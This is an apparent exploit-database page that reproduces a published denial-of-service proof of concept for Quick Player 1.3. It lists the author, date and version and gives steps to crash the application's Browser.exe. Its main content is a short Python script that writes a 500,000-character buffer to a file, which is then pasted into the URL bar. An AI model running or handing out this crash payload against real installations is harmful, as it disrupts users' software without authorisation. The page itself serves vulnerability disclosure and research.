Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060030

Below is a copy:

Quick Player 1.3 Denial Of Service
# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service
# Date: 06/05/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "poc.txt"

# 2.- Open the application "Browser.exe"

# 3.- Paste the contents of "poc.txt" within the url bar

# 4.- Crashed

# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif 

buffer = "A" * 500000

f = open ("poc.txt", "w")

f.write(buffer)

f.close()

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.